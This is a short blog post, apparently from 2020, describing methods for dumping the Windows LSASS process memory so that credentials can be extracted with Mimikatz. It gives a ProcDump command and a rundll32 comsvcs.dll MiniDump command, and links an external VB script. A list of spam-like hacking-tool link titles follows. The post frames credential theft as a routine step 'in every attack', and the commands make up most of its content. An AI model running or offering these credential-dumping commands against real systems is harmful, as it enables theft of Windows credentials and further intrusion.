jueves, 16 de abril de 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















More info
  1. Easy Hack Tools
  2. Pentest Box Tools Download
  3. What Are Hacking Tools
  4. Pentest Tools For Android
  5. Hacking Tools For Beginners
  6. Hacker Techniques Tools And Incident Handling
  7. Bluetooth Hacking Tools Kali
  8. Hack Tools Pc
  9. Hack Tools For Mac
  10. Tools For Hacker
  11. Pentest Tools List
  12. Nsa Hack Tools Download
  13. Pentest Recon Tools
  14. Hacker Tools Free
  15. Pentest Tools Find Subdomains
  16. Hacker Tools Windows
  17. Hacker Tools Free Download
  18. Install Pentest Tools Ubuntu
  19. Hack Apps
  20. Pentest Tools Bluekeep
  21. Hack Tools For Windows
  22. Pentest Tools Review

No hay comentarios: